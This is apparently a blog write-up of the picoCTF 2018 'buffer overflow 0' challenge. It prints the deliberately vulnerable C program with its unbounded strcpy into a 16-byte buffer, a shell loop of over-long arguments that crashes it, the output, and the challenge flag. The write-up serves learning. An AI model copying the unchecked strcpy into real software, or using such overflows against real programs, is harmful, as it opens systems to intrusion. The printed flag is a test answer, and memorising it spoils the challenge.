Recently Updated
Binary Exploitation 150: buffer overflow 0
Challenge
Let’s start off simple, can you overflow the right buffer in this program to get the flag?
You can also find it in /problems/buffer-overflow-0_4_ab1efebbee9446039487c64b88d38631
on the shell server.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig) {
fprintf(stderr, "%s\n", flag);
fflush(stderr);
exit(1);
}
void vuln(char *input){
char buf[16];
strcpy(buf, input);
}
int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
if (argc > 1) {
vuln(argv[1]);
printf("Thanks! Received: %s", argv[1]);
}
else
printf("This program takes 1 argument.\n");
return 0;
}
Solution
I initially compiled the code locally, found that -fno-stack-protector
was
required to disable stack smashing detection. Found the number of a
s required
to trigger a segfault, tried on server, nada. It required more As. I copied the
binary off of the server and tried running it and thought I’d start gdb’ing it,
but in the end I figured I’d try the lazy thing first:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
hxr@pico-2018-shell-1:/problems/buffer-overflow-0_4_ab1efebbee9446039487c64b88d38631$ for i in {a..z}; do ./vuln aaaaaaaaaaaaaaaaaaaaaaa$i; done;
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
picoCTF{ov3rfl0ws_ar3nt_that_bad_b49d36d2}
Thanks! Received: aaaaaaaaaaaaaaaaaaaaaaafSegmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
picoCTF{ov3rfl0ws_ar3nt_that_bad_b49d36d2}
Thanks! Received: aaaaaaaaaaaaaaaaaaaaaaalSegmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
picoCTF{ov3rfl0ws_ar3nt_that_bad_b49d36d2}
Thanks! Received: aaaaaaaaaaaaaaaaaaaaaaasSegmentation fault
Segmentation fault
picoCTF{ov3rfl0ws_ar3nt_that_bad_b49d36d2}
Thanks! Received: aaaaaaaaaaaaaaaaaaaaaaavSegmentation fault
Segmentation fault
Segmentation fault
picoCTF{ov3rfl0ws_ar3nt_that_bad_b49d36d2}
Thanks! Received: aaaaaaaaaaaaaaaaaaaaaaazhxr@pico-2018-shell-1:/problems/buffer-overflow-0_4_ab1efebbee9446039487c64b88d38631$
Flag
picoCTF{ov3rfl0ws_ar3nt_that_bad_b49d36d2}